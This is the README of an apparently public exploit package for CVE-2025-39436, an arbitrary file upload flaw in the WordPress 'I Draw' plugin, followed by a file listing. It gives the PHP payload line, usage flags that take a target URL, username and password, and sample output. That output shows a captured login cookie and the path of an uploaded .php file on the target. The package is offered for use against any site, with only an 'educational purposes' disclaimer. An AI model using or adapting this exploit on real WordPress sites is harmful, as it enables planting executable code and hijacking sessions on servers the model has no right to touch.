WordPress I Draw Plugin <= 1.0 is vulnerable to Arbitrary File Upload # 🚨 WordPress Plugin Exploit: CVE-2025-39436
## 📝 Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. This exploit allows attackers to upload malicious files without restriction. The issue impacts **I Draw versions up to 1.0**.
---
## 🛠️ Exploit Details
The exploit leverages the plugin's file upload functionality to execute a PHP payload. Below is the default payload used:
```php
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```
---
## 🚀 Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help Show this help message and exit
-u, --url URL Target website URL
-un, --username USERNAME
Username
-p, --password PASSWORD
```
---
## 💻 Script Output Example
```plaintext
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
```
---
## ⚠️ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.
---
*By: Nxploited ( Khaled Alenazi )*
[4.0K] /data/pocs/7f16eda47cd884489fbf69196bce6110989e961e
├── [1.9K] CVE-2025-39436.py
├── [1.1K] LICENSE
├── [1.4K] README.md
└── [ 9] requirements.txt
0 directories, 4 files